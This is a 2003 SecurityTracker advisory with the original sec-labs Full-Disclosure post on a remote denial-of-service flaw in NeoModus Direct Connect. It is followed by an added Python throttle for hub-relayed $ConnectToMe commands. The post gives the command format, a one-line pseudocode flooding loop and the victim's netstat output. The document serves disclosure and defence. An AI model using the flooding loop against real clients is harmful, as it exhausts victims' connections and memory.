


Category:   Application (File Transfer/Sharing)  >   Direct Connect
Vendors:   NeoModus
NeoModus Direct Connect Permits Remote Denial of Service Attacks
SecurityTracker Alert ID:  1007186
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 14 2003
Impact:   Denial of service via network

Version(s): 1.0 build 9 tested; possibly the 1.0 build 9.1 version
Description:   A resource consumption vulnerability was reported in the NeoModus Direct Connect file sharing application. A remote user can cause denial of service conditions on the target system.

The sec-labs team reported that a remote user can cause a connected target user's system to open a large number of connections to a specified port on a specified host by sending a command of the following format:

$ConnectToMe <U's username> <D's IP and port>|

This will reportedly cause denial of service conditions on the target user's system.

Only the Windows version was tested.

Impact:   A remote user can cause a large number of connections to be opened by the target user's system, resulting in resource starvation and denial of service conditions.
Solution:   No solution was available at the time of this entry.
Vendor URL:
Cause:   Resource error, State error
Underlying OS:  Windows (Any)
Underlying OS Comments:  Only the Windows version was tested

Message History:   None.

 Source Message Contents

Subject:  [Full-Disclosure] [sec-labs] Remote Denial of Service vulnerability in NeoModus


     sec-labs team proudly presents:
     Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
     and probably newest version.	  
     by Lord YuP


     Direct Connect is a Windows (I've found also a Linux version but
     I don't have time to test it) p2p file-sharing program, well 
     common nowadays.


     According to aDe, the DC Client to Client HandShake looks like:

     	Client <-> Client Communication in DC. 11-05-2002. By aDe 

	D = downloader 
	U = uploader 
	H = hub 

	D>H: $ConnectToMe <U's username> <D's IP and port>|
	H>U: $ConnectToMe <U's username> <D's IP and port>|

	...bla bla ... ;)

     As u can guess, the Direct Connect client, after receiving a
     "$ConnectToMe..." command from the hub, tries to connect to the
     specific IP and PORT sent by the Downloader.

     The attacker (evil-downloader) can send infinite requests
     to the HUB with a specific marked ip:port, causing a DoS attack 
     in the Victim's client. 

     Little example:
     Attacker: for (;;) { dc_send("$ConnectToMe victim",sample_port++); }

     Client: (ran "netstat -a")

	  TCP    jin:1993               JIN:0                  LISTENING
	  TCP    jin:1995               JIN:0                  LISTENING
	  TCP    jin:1996               JIN:0                  LISTENING
	  TCP    jin:2005               JIN:0                  LISTENING
	  TCP    jin:2006               JIN:0                  LISTENING
	  TCP    jin:2007               JIN:0                  LISTENING
	  TCP    jin:2008               JIN:0                  LISTENING
	  TCP    jin:2009               JIN:0                  LISTENING
	  TCP    jin:2010               JIN:0                  LISTENING
	  TCP    jin:2011               JIN:0                  LISTENING
	  TCP    jin:2012               JIN:0                  LISTENING
	  TCP    jin:2013               JIN:0                  LISTENING
	  TCP    jin:2014               JIN:0                  LISTENING
	  TCP    jin:2015               JIN:0                  LISTENING
	  TCP    jin:2016               JIN:0                  LISTENING
	  TCP    jin:2017               JIN:0                  LISTENING
	  TCP    jin:2018               JIN:0                  LISTENING
	  TCP    jin:2019               JIN:0                  LISTENING
	  ...and so on...


     The attacked client may be DoS-ed in that the internet connection
     can be reset/stopped; some clients may flood with "Out of Memory"
     msgboxes, in which case the system may not work correctly, and the DC
     client may be terminated.

sec-labs team []



Full-Disclosure - We believe in it.
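
Added example (not part of the SecurityTracker entry, the sec-labs message, or NeoModus code): one way a client could bound the resource use described above by validating and throttling hub-relayed $ConnectToMe commands before acting on them. The class name, the limits, and the dotted-quad "ip:port" form are assumptions; the sample commands in any test run are constructed.

```python
import re
import time
from collections import Counter, deque

# Wire format from the advisory: $ConnectToMe <nick> <ip>:<port>|
CTM_RE = re.compile(rb"\$ConnectToMe (\S+) (\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\|")


class ConnectToMeThrottle:
    """Bounds how many hub-relayed $ConnectToMe requests a client acts on."""

    def __init__(self, my_nick, max_per_window=5, window=10.0,
                 max_pending=8, clock=time.monotonic):
        self.my_nick = my_nick
        self.max_per_window = max_per_window  # hypothetical limits
        self.window = window
        self.max_pending = max_pending
        self.clock = clock
        self.accepted = deque()  # timestamps of requests we acted on
        self.pending = set()     # (ip, port) connects still in flight

    def decide(self, raw):
        """Return "connect" or the reason the command is dropped."""
        m = CTM_RE.fullmatch(raw)
        if m is None:
            return "malformed"
        nick, ip, port = m.group(1), m.group(2).decode(), int(m.group(3))
        if nick != self.my_nick.encode():
            return "not-for-us"
        if not 1 <= port <= 65535 or any(int(o) > 255 for o in ip.split(".")):
            return "bad-endpoint"
        now = self.clock()
        while self.accepted and now - self.accepted[0] >= self.window:
            self.accepted.popleft()  # forget requests outside the window
        if (ip, port) in self.pending:
            return "duplicate"
        if len(self.pending) >= self.max_pending:
            return "too-many-pending"
        if len(self.accepted) >= self.max_per_window:
            return "rate-limited"
        self.accepted.append(now)
        self.pending.add((ip, port))
        return "connect"

    def finished(self, ip, port):
        """Call when a connect attempt completes or fails."""
        self.pending.discard((ip, port))


def replay(throttle, commands):
    """Tally the decisions for a sequence of raw hub commands."""
    return Counter(throttle.decide(c) for c in commands)
```

The pending cap matters as much as the rate limit: without it, slow or never-completing connects accumulate across windows, which is the socket build-up shown in the netstat output.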

